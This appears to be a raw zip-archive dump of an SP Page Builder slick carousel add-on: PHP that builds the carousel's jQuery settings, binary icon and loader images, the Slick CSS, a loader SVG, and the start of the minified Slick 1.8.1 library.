		$autoplay = (isset($settings->autoplay) && $settings->autoplay) ? 1 : 0;
		$autoplay_pause_onhover = (isset($settings->autoplay_pause_onhover) && $settings->autoplay_pause_onhover) ? 1 : 0;
		$autoplay_pause_onfocus = (isset($settings->autoplay_pause_onfocus) && $settings->autoplay_pause_onfocus) ? 1 : 0;
		$autoplay_interval = (isset($settings->autoplay_interval) && $settings->autoplay_interval) ? $settings->autoplay_interval : 5000;
		$speed = (isset($settings->speed) && $settings->speed) ? $settings->speed : 500;
		$arrows = (isset($settings->arrows) && $settings->arrows) ? 1 : 0;
		$arrows_class = (isset($settings->arrows_class) && $settings->arrows_class) ? ' '. $settings->arrows_class : '';
		$counter = (isset($settings->counter) && $settings->counter) ? 1 : 0;
		$dots = (isset($settings->dots) && $settings->dots) ? 1 : 0;
		$autoheight = (isset($settings->autoheight) && $settings->autoheight) ? 1 : 0;
		$rtl_support = (isset($settings->rtl_support) && $settings->rtl_support) ? 1 : 0;
		$breakpoint1 = (isset($settings->breakpoint1) && $settings->breakpoint1) ? $settings->breakpoint1 : 992;
		$slidestoshow_break1 = (isset($settings->slidestoshow_break1) && $settings->slidestoshow_break1) ? $settings->slidestoshow_break1 : 3;
		$breakpoint2 = (isset($settings->breakpoint2) && $settings->breakpoint2) ? $settings->breakpoint2 : 768;
		$slidestoshow_break2 = (isset($settings->slidestoshow_break2) && $settings->slidestoshow_break2) ? $settings->slidestoshow_break2 : 2;
		$breakpoint3 = (isset($settings->breakpoint3) && $settings->breakpoint3) ? $settings->breakpoint3 : 480;
		$slidestoshow_break3 = (isset($settings->slidestoshow_break3) && $settings->slidestoshow_break3) ? $settings->slidestoshow_break3 : 1;
		$title = (isset($settings->title) && $settings->title) ? $settings->title : '';
		$infiniteloop == 0 ? $infiniteloop = 'infinite:false,' : $infiniteloop = '';
		if($autoplay_interval == '') {$autoplay_interval = '5000';} 
		
		$autoplay == 1 ? $autoplay = 'autoplay: true,autoplaySpeed: '.$autoplay_interval.',' : $autoplay = '';
		$autoplay_pause_onhover == 1 ? $autoplay_pause_onhover = '' : $autoplay_pause_onhover = 'pauseOnHover:false,';
		$autoplay_pause_onfocus == 1 ? $autoplay_pause_onfocus = '' : $autoplay_pause_onfocus = 'pauseOnHover:false,';
		
		$speed == '' ? $speed = 'speed:500,' : $speed = 'speed:'.(int) $speed.',';
		$fade_effect == 1 ? $fade_effect = 'fade:true,' : $fade_effect = '';
		$arrows == 0 ? $arrows = 'arrows:false,' : $arrows = '';
		$dots == 1 ? $dots = 'dots:true,' : $dots = '';
		$autoheight == 1 ? $autoheight = 'adaptiveHeight:true,' : $autoheight = '';
		
		// RTL Support
		if ($rtl_support == 1) { 
			$rtl_support = 'rtl:true,';
			$rtl = ' dir="rtl"';
		} else {
			$rtl_support = '';
			$rtl = '';
		}
		
		$var_counter = '';
		$show_counter = '';	
		
		if ($counter == 1) { 
		$var_counter = '
			var total_slides;
			$slick_carousel.on("init reInit afterChange", function (event, slick, currentSlide) {
				var prev_slide_index, next_slide_index, current;
				var $prev_counter = $slick_carousel.find(".slick-prev .slick-counter");
				var $next_counter = $slick_carousel.find(".slick-next .slick-counter");
				total_slides = slick.slideCount;
				current = (currentSlide ? currentSlide : 0) + 1;
				prev_slide_index = (current - 1 < 1) ? total_slides : current - 1;
				next_slide_index = (current + 1 > total_slides) ? 1 : current + 1;
				$prev_counter.text(prev_slide_index + "/" + total_slides);
				$next_counter.text(next_slide_index + "/"+ total_slides);
			});
			';
			$counter = '1' ? $show_counter = '<h4 class="slick-counter"></h4>' : $show_counter = '';
		} 
		
		$js = 'jQuery(function($){
		var $slick_carousel = jQuery("#slick-carousel-'.$this->addon->id.'");
		jQuery(document).ready(function(){ 
		   '.$var_counter.'
    		$slick_carousel.slick({
			 '.$infiniteloop.'
			  '.$lazyloading.'
			  slidesToShow: ' . $slidestoshow . ',
			  slidesToScroll: ' . $slidestoscroll . ',
			  nextArrow: \'<span class="slick-next'.$arrows_class.'">'.$show_counter.'<i class="pe pe-7s-angle-right"></i></span>\',
			  prevArrow: \'<span class="slick-prev'.$arrows_class.'">'.$show_counter.'<i class="pe pe-7s-angle-left"></i></span>\',
			  '.$rtl_support.'
			  '.$autoplay.'
			  '.$autoplay_pause_onhover.'
			  '.$autoplay_pause_onfocus.'
			  '.$fade_effect.'
			  '.$speed.'
			  '.$arrows.'
			  '.$dots.'
			  '.$autoheight.' 
			  cssEase: \'cubic-bezier(0.635, 0.010, 0.355, 1.000)\',
			  responsive: [
				{
				  breakpoint:'.$breakpoint1.',
				  settings: {
					slidesToShow:'.$slidestoshow_break1.',
					slidesToScroll:'.$slidestoshow_break1.'
				  }
				},
				{
				  breakpoint:'.$breakpoint2.',
				  settings: {
					slidesToShow:'.$slidestoshow_break2.',
					slidesToScroll:'.$slidestoshow_break2.'
				  }
				},
				{
				  breakpoint:'.$breakpoint3.',
				  settings: {
					slidesToShow:'.$slidestoshow_break3.',
					slidesToScroll:'.$slidestoshow_break3.'
				  }
				}
			  ]
			});
  		});
	});'; 
	$js = preg_replace(array('/([\s])\1+/', '/[\n\t]+/m'), '', $js); // Remove whitespace
	return $js;
	}
}
PK!�m����?flex/sppagebuilder/addons/slick_carousel/assets/images/icon.pngnu&1i��PNG


IHDR@@�iq�tEXtSoftwareAdobe ImageReadyq�e<nIDATx��[oh[U?I�e	6���͵	�������Vө���g��IT�D�:T���Mp (�t���''�A퇉�"f0��ڭ�v�����I�4��s��$��ř��㐗wϻ�s���s�{�"e��Sn@?=�R�w��'�уm3���|�/�K^��,�����냋���z����c/��
�I�70�ʕ_�����&�*Ljv����Q:l�x�MO�m�;LH�A��S�� ^�-^!��~^,@���4^(��
�Ct�c�Z����6��!�C��r�g;��^�g(0'��ywK-���^�?Z�g������]R����
D�i� W&%:Ŏ�&8�@8l��:�f�w����ް��^J?#�:F��f#��i�����d�sy���T�r�ɕ�^g-�ILf!���Wi6s:[>?���T�T��R� �R1  �0,(;�PLǂx�s+���h����,�d�@YQf,��"������G�Ix��PA��R
�H(3ʞ����$��KN8�bxO�XC�[���"V*
�˞��My|F�a�j2�k�N�Yt���
y�$}�#���	e���χ���B�,x\v>��.����( ���`���|P|�s[a�\��d$Θmf8@��6/�|�8
l�	i����9�Ss �=2�\�0<<�F����("'���)yBw�{=��P�X����i�@#d�ǁ�mଳD�����p#2A<����:�@Ň'�à����8����RT�
���;���1~2vM��X�}�]Y��0�QW:��R"c2�;l���[Y[���t����Yt2�
ut�̨��R��
M�����|,����T����>W=��#��I�(��fᅮ��'"�%DJ��Ι�h��pB�r|Z�ǣ�J,�I����FdJQ�&%�8;O�ɥy2�.&��W��W��)��l]���_ӫ��- �	n$a>��l�]M����5�C�u����6@s�ԖO�7C��]��-��gb��uv���&��	K�Λp��4$�7��a����hk#�0����;ZV^y,�p�.�<p����x������uo5eT��X4���z,����(=wX��	�}����u�TlԔ��г��j]:F�`5�0�?�%K7R�bv�	W�໩0L��)�_�7��Z
��q�=k)�`�kD�y�������j����ꞁq�Bįa��͐O�l��&_M�S����M��h������V���J��xZg��Y�o���U�����YȔ�'NW��镁}⛧����i7u���>OU���7�[����X����IEND�B`�PK!��9lRRCflex/sppagebuilder/addons/slick_carousel/assets/css/ajax-loader.gifnu&1i�GIF89a  �������������������~~~������������������⸸������쮮����>>>VVV```|||������JJJlll���������,,,^^^LLL���!�Created with ajaxload.info!�
!�NETSCAPE2.0,  �@�pH$8Gq�$N�A�3(
�L	��V�K|P(���:(r�Bь�_@X!/�BxBnb}Eg�orEg�^	oWD	cJCgoqmo���	�E�{p~
��r��D�}ŠM�d������K���r����񋇅o�
��|�����̩ò�]�q�āӤ` 9C�f)�$'�=�Ê}�C�^u�-�H.!��ܻ�ݧ��
	�O�K"1����5.&{j�T� �BBo�e���6��<�@�B?��1
�)�G�bK�� !�
,  �@�pH$&4Bq�$D�b(����V���[4_��:t:"r�qh@��a��)ȉgBk_oEg~�#rJDgxloWF	C	~mg		oD

B�wK!��
�C��ɶwE� �ʢd�X��������r������
��s'��xM
&T$$��|M��C�ڟ� A���Bl�d��ڵ�Kd�V��?oFl-X� �L[�J*�Ξ6�!�"��	5\@���p�oIm
��N!Q�Xm�@ק%2u:uH2�\�R�#�a!�
,  �@�pH$
�Bq�$&D���(�L��V�
[$���:4P(
r�s��_���IȉgBxBoE gw^	r�FgW�oWDcB

��g	oD%#��
v JEin�E�
~"�#�L	��d$��L
�X"yrv�E�����ͻ�d�����)xWO�<2���I�&��1a���"��UJ�(q�z�	�+��kQ�\" ����*�tRj��O�}C���7":�s�dE& �R*�"#��-����=�L���֯Q�2s:d+q�V����� !�
,  �@�pH$.Aq�4�B��d&"t ��jQ�P(��.�q8���Hy�"�3\HV$�QBm{Oeu
pzBeRumTDC�
�W
�mDCe
�t�B]�c�~�	
�aV�jU�U�f{
����L���{[H��øU����{���������i�98�\q���*��3��n�%��L\�@��0������2�T��*	9��}�t��I�*D9�x�6�ϴ�F]l"���!M�!0ըT,D�*�FT׮pq!�
,  �@�pH,*��rILGA��\&�g�L�E�B*���.F�C�Уv���~,$�wSGIrjmgBGTrjTD��G�WH��j\CG
v�B	d�a�
zw%��V��`�
�E|m%�mv�L�ي�`	�����L��䩻w�����ہ��K�U�b�Ȁ�-�FA�;!:t�p�_3G�8� �C�E69<�A��N�踁�;"�,H�@�#"8H�Y��M498���EB[ɒo�.96d�0NRU�A�tU�DX�8�l*��M��!�
,  �@�pH,*��rILGAQ�T&�g�XP$�ӭ���p1r�͙�Z����9��|�jfBGi~WeF
C�
��}R�iCyq�N��N	�aGus �L�
�`���K]�K	 �L�`�E�΃�U��]���K��
���`���
���z��չ���W�D�Jl��X�@A�d�pESB`A
X�	��!1P�!"��MZ� �:� A��&�:�ED�!HP��ϖ5:�p��H?��@������A�4���(Y��СD�V����.!�
,  �@�pH,*��rILGAQ�T&�g�XP$�ӭ���p1r�͙�Z����9��|�jfBGi~WeE	y�
��}R�inlHCq�N��N]�aGuz���C�
�`��L��j���z���ƒ�`���d���L������K������U����ϿW�D�c��j
���s�0R%��+q���"�lQbw�
Р�F�.С�
0�s3�SIH�D����svV�<	�+��4
�9�
���BT��~A�2�$O!(\���*ח8�!�
,  �@�pH,*��rILGAQ�T&�g�XP$�ӭ���p1r�͙�Z����9��|�jfBGi~WeE	y�
��}R�inlHCq�N��N]�aGuz���C�
�`��L��j���z���ƒ���Īɹsd�Ϊ�L���Ŀ���C�ҿW�E�O��j�������B��B!J`*��"�lm��8p���4��!(P0�EM(PC�!ʐ#�48���I�2�=���!4�CC�
q@�ïB�*�6�p
�$�
��!�
,  �@�pH,*��rILGAQ�T&�g�XP$�ӭ���p1r�͙�Z����9��|�jfBGi~WeE	y�
��}R�inlHCq�N��N]�aGuz���C�
�`��L��j���z���ƒ���Īɹsd�Ϊ�L���Ŀ���Cؿ̫`##s��E�s�G��#%B	�)�M���p`
&0 EDba���7pp�@7g���dD#Kv[@�ï!�(@B�$O1�0oV��!OO�>P�����d�8@��,9J��,7�p
+�A�`�!�
	,  �@�pH,*��rILGAQ�T&�g�XP$�ӭ���p1r�͙�Z����9��|�jfBGi~WeE	y�
��}R�inlHCq�N��N]�aGuz���C�
�`��L��j���z�L���g��R���d������z��
����z�ʽD��U	sP�Ls��J�6L���HQV0��'��hZ%��8@@�.�ED�tC
l�V`X�S������?X�	q��!�+����@*-�҄�FxB�����\�F�3�֮��
]!�

,  �@�pH,*��rILGAQ�T&�g�XP$�ӭ���p1r�͙�Z����9��|�jEGi~WeE	y#D�}R�
inlHB!�$CfCN]�E��j�
���$s��L�j�Nsz�E���g�����dG�
����z��
����z��\�U
�j�cb��������� �Ӫ\] 2!d��ZnV��Tg��L0 ��F2�T��ȇ �
`�Ǖ�2Fj�����k
�XT�.5X:)
��5,'R��,�tPuyz�*R0|�!�
,  �@�pH,*��rI4����8e*�TJ,(�"�Ӂ��*�GN����y#���`xDdk\GnEd�i	�C	�Dd�SGm}GI��B$J�^�E��a�
jD	�x��K�n��x��E���x��
����G������nh����a�C�
J��V8pI�h�>���KE�8�D\�2$���C�!"�Хj1��YB� ӂS
��T@D��5d8���52��^I�$����?�*aij�'T5U�*���G�
N:�J�lӱ#�2a�-;PK!K�[B��=flex/sppagebuilder/addons/slick_carousel/assets/css/slick.cssnu&1i�/* Slick CSS */
.slick-list,.slick-slider,.slick-track{position:relative;display:block}.slick-loading .slick-slide,.slick-loading .slick-track{visibility:hidden}.slick-slider{margin:0 auto;-moz-box-sizing:border-box;box-sizing:border-box;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;-webkit-touch-callout:none;-khtml-user-select:none;-ms-touch-action:pan-y;touch-action:pan-y;-webkit-tap-highlight-color:transparent}.slick-list{overflow:hidden;margin:0;padding:0}.slick-list:focus{outline:0}.slick-list.dragging{cursor:pointer;cursor:hand}.slick-slider .slick-list,.slick-slider .slick-track{-webkit-transform:translate3d(0,0,0);-moz-transform:translate3d(0,0,0);-ms-transform:translate3d(0,0,0);-o-transform:translate3d(0,0,0);transform:translate3d(0,0,0)}.slick-track{top:0;left:0}.slick-track:after,.slick-track:before{display:table;content:''}.slick-track:after{clear:both}.slick-slide{display:none;float:left;height:100%;min-height:1px}[dir=rtl] .slick-slide{float:right}.slick-slide img{display:block;width:100%}.slick-slide.slick-loading img{display:none}.slick-slide.dragging img{pointer-events:none}.slick-initialized .slick-slide{display:block}.slick-vertical .slick-slide{display:block;height:auto;border:1px solid transparent}.slick-img.no-bckg-img{text-align:center}.slick-img.no-bckg-img h3{margin:0 auto 5px;padding:0;line-height:1.5}.slick-img.no-bckg-img .slick-desc{font-size:100%;text-align:center;margin:0 auto;padding:0}.slick-img.no-bckg-img .slick-desc img{width:auto;padding:0;margin:0 auto;text-align:center}.slick-img.no-bckg-img .slick-desc p{padding:10px 20px}.slick-img.no-bckg-img .slick-desc button{margin:0 1px 5px;padding:6px 15px;text-align:center}.slick-img.no-bckg-img .slick-desc button>span{text-align:center}.slick-desc{margin:0 auto;font-size:90%}.slick-loading{height:44px;max-height:44px;width:44px;padding-top:36.3%;-webkit-transform-origin:50% 50%;transform-origin:50% 50%;background: url("loader.svg") 50% 50% no-repeat;}
.slick-next,.slick-prev{font-size:0;line-height:0;position:absolute;top:50%;display:block;padding:0;cursor:pointer;color:#fff;border:none;outline:0;background:rgba(0,0,0,.25);opacity:.8;transition:all .3s ease-in-out;-webkit-transition:all .3s ease-in-out;z-index:2}.slick-next:focus,.slick-next:hover,.slick-prev:focus,.slick-prev:hover{outline:0}.slick-next:hover,.slick-prev:hover{opacity:1}.slick-next i.pe,.slick-prev i.pe{font-size:32px}.slick-prev{left:0;border-radius:0 3px 3px 0}[dir=rtl] .slick-prev:before{right:0;left:auto}.slick-next{right:0;border-radius:3px 0 0 3px}[dir=rtl] .slick-next:before{right:auto;left:0}.slick-next .slick-counter,.slick-prev .slick-counter{position:absolute;height:44px;line-height:40px;width:auto;margin-top:0;border-radius:4px;font-size:15px;padding:1px 5px;opacity:1;z-index:0}.slick-dots,.slick-dots li{position:relative;margin:0 auto;padding:0}.slick-prev .slick-counter{left:-40px;text-align:right}.slick-next .slick-counter{right:-40px;text-align:left}.slick-dots{top:10px;height:20px;line-height:20px;display:block;width:100%;list-style:none;text-align:center}.slick-dots li,.slick-dots li button,.slick-dots li button:before{width:20px;height:20px;background:0 0}.slick-dots li{display:inline!important;cursor:pointer;border:0!important;outline:0}.slick-dots li button{font-size:0;line-height:0;display:inline-block;padding:5px;cursor:pointer;text-indent:-9999em}.slick-dots li button:focus,.slick-dots li button:hover{outline:0}.slick-dots li button:focus:before,.slick-dots li button:hover:before{opacity:.5}.slick-dots li button:before{font-family:"Font Awesome 5 Free";font-style:normal;font-weight:900;content:"\f111";font-size:10px;line-height:20px;position:absolute;top:0;left:0;text-align:center;opacity:.45;text-indent:0;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;border:0;box-shadow:none;outline:0}.slick-dots li.slick-active button:before{opacity:1;border:0;box-shadow:none;outline:0;background:0 0}PK!ݙ�`��>flex/sppagebuilder/addons/slick_carousel/assets/css/loader.svgnu&1i� <svg version="1.1" id="loader-1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
   width="40px" height="40px" viewBox="0 0 40 40" enable-background="new 0 0 40 40" xml:space="preserve">
  <path opacity="0.2" fill="#000" d="M20.201,5.169c-8.254,0-14.946,6.692-14.946,14.946c0,8.255,6.692,14.946,14.946,14.946
    s14.946-6.691,14.946-14.946C35.146,11.861,28.455,5.169,20.201,5.169z M20.201,31.749c-6.425,0-11.634-5.208-11.634-11.634
    c0-6.425,5.209-11.634,11.634-11.634c6.425,0,11.633,5.209,11.633,11.634C31.834,26.541,26.626,31.749,20.201,31.749z"/>
  <path fill="#000" d="M26.013,10.047l1.654-2.866c-2.198-1.272-4.743-2.012-7.466-2.012h0v3.312h0
    C22.32,8.481,24.301,9.057,26.013,10.047z">
    <animateTransform attributeType="xml"
      attributeName="transform"
      type="rotate"
      from="0 20 20"
      to="360 20 20"
      dur="0.5s"
      repeatCount="indefinite"/>
    </path>
  </svg>PK!. y焧��?flex/sppagebuilder/addons/slick_carousel/assets/js/slick.min.jsnu&1i�/* Version: 1.8.1 */
!function(i){"use strict";"function"==typeof define&&define.amd?define(["jquery"],i):"undefined"!=typeof exports?module.exports=i(require("jquery")):i(jQuery)}(function(i){"use strict";var e=window.Slick||{};(e=function(){var e=0;return function(t,o){var s,n=this;n.defaults={accessibility:!0,adaptiveHeight:!1,appendArrows:i(t),appendDots:i(t),arrows:!0,asNavFor:null,prevArrow:'<button class="slick-prev" aria-label="Previous" type="button">Previous</button>',nextArrow:'<button class="slick-next" aria-label="Next" type="button">Next</button>',autoplay:!1,autoplaySpeed:3e3,centerMode:!1,centerPadding:"50px",cssEase:"ease",customPaging:function(e,t){return i('<button type="button" />').text(t+1)},dots:!1,dotsClass:"slick-dots",draggable:!0,easing:"linear",edgeFriction:.35,fade:!1,focusOnSelect:!1,focusOnChange:!1,infinite:!0,initialSlide:0,lazyLoad:"ondemand",mobileFirst:!1,pauseOnHover:!0,pauseOnFocus:!0,pauseOnDotsHover:!1,respondTo:"window",responsive:null,rows:1,rtl:!1,slide:"",slidesPerRow:1,slidesToShow:1,slidesToScroll:1,speed:500,swipe:!0,swipeToSlide:!1,touchMove:!0,touchThreshold:5,useCSS:!0,useTransform:!0,variableWidth:!1,vertical:!1,verticalSwiping:!1,waitForAnimate:!0,zIndex:1e3},n.initials={animating:!1,dragging:!1,autoPlayTimer:null,currentDirection:0,currentLeft:null,currentSlide:0,direction:1,$dots:null,listWidth:null,listHeight:null,loadIndex:0,$nextArrow:null,$prevArrow:null,scrolling:!1,slideCount:null,slideWidth:null,$slideTrack:null,$slides:null,sliding:!1,slideOffset:0,swipeLeft:null,swiping:!1,$list:null,touchObject:{},transformsEnabled:!1,unslicked:!1},i.extend(n,n.initials),n.activeBreakpoint=null,n.animType=null,n.animProp=null,n.breakpoints=[],n.breakpointSettings=[],n.cssTransitions=!1,n.focussed=!1,n.interrupted=!1,n.hidden="hidden",n.paused=!0,n.positionProp=null,n.respondTo=null,n.rowCount=1,n.shouldClick=!0,n.$slider=i(t),n.$slidesCache=null,n.transformType=null,n.transitionType=null,n.visibilityChange="visibilitychange",n.windowWidth=0,n.windowTimer=null,s=i(t).data("slick")||{},n.options=i.extend({},n.defaults,o,s),n.currentSlide=n.options.initialSlide,n.originalSettings=n.options,void 0!==document.mozHidden?(n.hidden="mozHidden",n.visibilityChange="mozvisibilitychange"):void 0!==document.webkitHidden&&(n.hidden="webkitHidden",n.visibilityChange="webkitvisibilitychange"),n.autoPlay=i.proxy(n.autoPlay,n),n.autoPlayClear=i.proxy(n.autoPlayClear,n),n.autoPlayIterator=i.proxy(n.autoPlayIterator,n),n.changeSlide=i.proxy(n.changeSlide,n),n.clickHandler=i.proxy(n.clickHandler,n),n.selectHandler=i.proxy(n.selectHandler,n),n.setPosition=i.proxy(n.setPosition,n),n.swipeHandler=i.proxy(n.swipeHandler,n),n.dragHandler=i.proxy(n.dragHandler,n),n.keyHandler=i.proxy(n.keyHandler,n),n.instanceUid=e++,n.htmlExpr=/^(?:\s*(<[\w\W]+>)[^>]*)$/,n.registerBreakpoints(),n.init(!0)}}()).prototype.activateADA=function(){this.$slideTrack.find(".slick-active").attr({"aria-hidden":"false"}).find("a, input, button, select").attr({tabindex:"0"})},e.prototype.addSlide=e.prototype.slickAdd=function(e,t,o){var s=this;if("boolean"==typeof t)o=t,t=null;else if(t<0||t>=s.slideCount)return!1;s.unload(),"number"==typeof t?0===t&&0===s.$slides.length?i(e).appendTo(s.$slideTrack):o?i(e).insertBefore(s.$slides.eq(t)):i(e).insertAfter(s.$slides.eq(t)):!0===o?i(e).prependTo(s.$slideTrack):i(e).appendTo(s.$slideTrack),s.$slides=s.$slideTrack.children(this.options.slide),s.$slideTrack.children(this.options.slide).detach(),s.$slideTrack.append(s.$slides),s.$slides.each(function(e,t){i(t).attr("data-slick-index",e)}),s.$slidesCache=s.$slides,s.reinit()},e.prototype.animateHeight=function(){var i=this;if(1===i.options.slidesToShow&&!0===i.options.adaptiveHeight&&!1===i.options.vertical){var e=i.$slides.eq(i.currentSlide).outerHeight(!0);i.$list.animate({height:e},i.options.speed)}},e.prototype.animateSlide=function(e,t){var o={},s=this;s.animateHeight(),!0===s.options.rtl&&!1===s.options.vertical&&(e=-e),!1===s.transformsEnabled?!1===s.options.vertical?s.$slideTrack.animate({left:e},s.options.speed,s.options.easing,t):s.$slideTrack.animate({top:e},s.options.speed,s.options.easing,t):!1===s.cssTransitions?(!0===s.options.rtl&&(s.currentLeft=-s.currentLeft),i({animStart:s.currentLeft}).animate({animStart:e},{duration:s.options.speed,easing:s.options.easing,step:function(i){i=Math.ceil(i),!1===s.options.vertical?(o[s.animType]="translate("+i+"px, 0px)",s.$slideTrack.css(o)):(o[s.animType]="translate(0px,"+i+"px)",s.$slideTrack.css(o))},complete:function(){t&&t.call()}})):(s.applyTransition(),e=Math.ceil(e),!1===s.options.vertical?o[s.animType]="translate3d("+e+"px, 0px, 0px)":o[s.animType]="translate3d(0px,"+e+"px, 0px)",s.$slideTrack.css(o),t&&setTimeout(function(){s.disableTransition(),t.call()},s.options.speed))},e.prototype.getNavTarget=function(){var e=this,t=e.options.asNavFor;return t&&null!==t&&(t=i(t).not(e.$slider)),t},e.prototype.asNavFor=function(e){var t=this.getNavTarget();null!==t&&"object"==typeof t&&t.each(function(){var t=i(this).slick("getSlick");t.unslicked||t.slideHandler(e,!0)})},e.prototype.applyTransition=function(i){var e=this,t={};!1===e.options.fade?t[e.transitionType]=e.transformType+" "+e.options.speed+"ms "+e.options.cssEase:t[e.transitionType]="opacity "+e.options.speed+"ms "+e.options.cssEase,!1===e.options.fade?e.$slideTrack.css(t):e.$slides.eq(i).css(t)},e.prototype.autoPlay=function(){var i=this;i.autoPlayClear(),i.slideCount>i.options.slidesToShow&&(i.autoPlayTimer=setInterval(i.autoPlayIterator,i.options.autoplaySpeed))},e.prototype.autoPlayClear=function(){var i=this;i.autoPlayTimer&&clearInterval(i.autoPlayTimer)},e.prototype.autoPlayIterator=function(){var i=this,e=i.currentSlide+i.options.slidesToScroll;i.paused||i.interrupted||i.focussed||(!1===i.options.infinite&&(1===i.direction&&i.currentSlide+1===i.slideCount-1?i.direction=0:0===i.direction&&(e=i.currentSlide-i.options.slidesToScroll,i.currentSlide-1==0&&(i.direction=1))),i.slideHandler(e))},e.prototype.buildArrows=function(){var e=this;!0===e.options.arrows&&(e.$prevArrow=i(e.options.prevArrow).addClass("slick-arrow"),e.$nextArrow=i(e.options.nextArrow).addClass("slick-arrow"),e.slideCount>e.options.slidesToShow?(e.$prevArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.$nextArrow.removeClass("slick-hidden").removeAttr("aria-hidden tabindex"),e.htmlExpr.test(e.options.prevArrow)&&e.$prevArrow.prependTo(e.options.appendArrows),e.htmlExpr.test(e.options.nextArrow)&&e.$nextArrow.appendTo(e.options.appendArrows),!0!==e.options.infinite&&e.$prevArrow.addClass("slick-disabled").attr("aria-disabled","true")):e.$prevArrow.add(e.$nextArrow).addClass("slick-hidden").attr({"aria-disabled":"true",tabindex:"-1"}))},e.prototype.buildDots=function(){var e,t,o=this;if(!0===o.options.dots){for(o.$slider.addClass("slick-dotted"),t=i("<ul />").addClass(o.options.dotsClass),e=0;e<=o.getDotCount();e+=1)t.append(i("<li />").append(o.options.customPaging.call(this,o,e)));o.$dots=t.appendTo(o.options.appendDots),o.$dots.find("li").first().addClass("slick-active")}},e.prototype.buildOut=function(){var e=this;e.$slides=e.$slider.children(e.options.slide+":not(.slick-cloned)").addClass("slick-slide"),e.slideCount=e.$slides.length,e.$slides.each(function(e,t){i(t).attr("data-slick-index",e).data("originalStyling",i(t).attr("style")||"")}),e.$slider.addClass("slick-slider"),e.$slideTrack=0===e.slideCount?i('<div class="slick-track"/>').appendTo(e.$slider):e.$slides.wrapAll('<div class="slick-track"/>').parent(),e.$list=e.$slideTrack.wrap('<div class="slick-list"/>').parent(),e.$slideTrack.css("opacity",0),!0!==e.options.centerMode&&!0!==e.options.swipeToSlide||(e.options.slidesToScroll=1),i("img[data-lazy]",e.$slider).not("[src]").addClass("slick-loading"),e.setupInfinite(),e.buildArrows(),e.buildDots(),e.updateDots(),e.setSlideClasses("number"==typeof e.currentSlide?e.currentSlide:0),!0===e.options.draggable&&e.$list.addClass("draggable")},e.prototype.buildRows=function(){var i,e,t,o,s,n,r,l=this;if(o=document.createDocumentFragment(),n=l.$slider.children(),l.options.rows>1){for(r=l.options.slidesPerRow*l.options.rows,s=Math.ceil(n.length/r),i=0;i<s;i++){var d=document.createElement("div");for(e=0;e<l.options.rows;e++){var a=document.createElement("div");for(t=0;t<l.options.slidesPerRow;t++){var c=i*r+(e*l.options.slidesPerRow+t);n.get(c)&&a.appendChild(n.get(c))}d.appendChild(a)}o.appendChild(d)}l.$slider.empty().append(o),l.$slider.children().children().children().css({width:100/l.options.slidesPerRow+"%",display:"inline-block"})}},e.prototype.checkResponsive=function(e,t){var o,s,n,r=this,l=!1,d=r.$slider.width(),a=window.innerWidth||i(window).width();if("window"===r.respondTo?n=a:"slider"===r.respondTo?n=d:"min"===r.respondTo&&(n=Math.min(a,d)),r.options.responsive&&r.options.responsive.length&&null!==r.options.responsive){s=null;for(o in r.breakpoints)r.breakpoints.hasOwnProperty(o)&&(!1===r.originalSettings.mobileFirst?n<r.breakpoints[o]&&(s=r.breakpoints[o]):n>r.breakpoints[o]&&(s=r.breakpoints[o]));null!==s?null!==r.activeBreakpoint?(s!==r.activeBreakpoint||t)&&(r.activeBreakpoint=s,"unslick"===r.breakpointSettings[s]?r.unslick(s):(r.options=i.extend({},r.originalSettings,r.breakpointSettings[s]),!0===e&&(r.currentSlide=r.options.initialSlide),r.refresh(e)),l=s):(r.activeBreakpoint=s,"unslick"===r.breakpointSettings[s]?r.unslick(s):(r.options=i.extend({},r.originalSettings,r.breakpointSettings[s]),!0===e&&(r.currentSlide=r.options.initialSlide),r.refresh(e)),l=s):null!==r.activeBreakpoint&&(r.activeBreakpoint=null,r.options=r.originalSettings,!0===e&&(r.currentSlide=r.options.initialSlide),r.refresh(e),l=s),e||!1===l||r.$slider.trigger("breakpoint",[r,l])}},e.prototype.changeSlide=function(e,t){var o,s,n,r=this,l=i(e.currentTarget);switch(l.is("a")&&e.preventDefault(),l.is("li")||(l=l.closest("li")),n=r.slideCount%r.options.slidesToScroll!=0,o=n?0:(r.slideCount-r.currentSlide)%r.options.slidesToScroll,e.data.message){case"previous":s=0===o?r.options.slidesToScroll:r.options.slidesToShow-o,r.slideCount>r.options.slidesToShow&&r.slideHandler(r.currentSlide-s,!1,t);break;case"next":s=0===o?r.options.slidesToScroll:o,r.slideCount>r.options.slidesToShow&&r.slideHandler(r.currentSlide+s,!1,t);break;case"index":var d=0===e.data.index?0:e.data.index||l.index()*r.options.slidesToScroll;r.slideHandler(r.checkNavigable(d),!1,t),l.children().trigger("focus");break;default:return}},e.prototype.checkNavigable=function(i){var e,t;if(e=this.getNavigableIndexes(),t=0,i>e[e.length-1])i=e[e.length-1];else for(var o in e){if(i<e[o]){i=t;break}t=e[o]}return i},e.prototype.cleanUpEvents=function(){var e=this;e.options.dots&&null!==e.$dots&&(i("li",e.$dots).off("click.slick",e.changeSlide).off("mouseenter.slick",i.proxy(e.interrupt,e,!0)).off("mouseleave.slick",i.proxy(e.interrupt,e,!1)),!0===e.options.accessibility&&e.$dots.off("keydown.slick",e.keyHandler)),e.$slider.off("focus.slick blur.slick"),!0===e.options.arrows&&e.slideCount>e.options.slidesToShow&&(e.$prevArrow&&e.$prevArrow.off("click.slick",e.changeSlide),e.$nextArrow&&e.$nextArrow.off("click.slick",e.changeSlide),!0===e.options.accessibility&&(e.$prevArrow&&e.$prevArrow.off("keydown.slick",e.keyHandler),e.$nextArrow&&e.$nextArrow.off("keydown.slick",e.keyHandler))),e.$list.off("touchstart.slick mousedown.slick",e.swipeHandler),e.$list.off("touchmove.slick mousemove.slick",e.swipeHandler),e.$list.off("touchend.slick mouseup.slick",e.swipeHandler),e.$list.off("touchcancel.slick 